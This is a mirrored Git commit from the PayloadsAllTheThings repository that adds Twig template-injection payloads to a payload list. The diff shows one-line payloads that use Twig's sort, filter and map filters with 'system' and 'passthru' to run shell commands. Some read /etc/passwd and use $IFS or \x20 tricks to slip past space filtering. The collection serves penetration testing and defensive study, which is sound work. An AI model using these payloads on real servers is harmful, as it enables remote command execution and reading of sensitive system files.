mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-31 07:27:25 +00:00
Merge pull request #639 from TomWilford/master
Added Twig 'passthru' filter exploits
This commit is contained in:
commit
55df53105e
@ -966,6 +966,8 @@ $output = $twig > render (
|
|||||||
{{['id',1]|sort('system')|join}}
|
{{['id',1]|sort('system')|join}}
|
||||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||||
|
{{['id']|filter('passthru')}}
|
||||||
|
{{['id']|map('passthru')}}
|
||||||
```
|
```
|
||||||
|
|
||||||
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
|
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
|
||||||
|
Loading…
Reference in New Issue
Block a user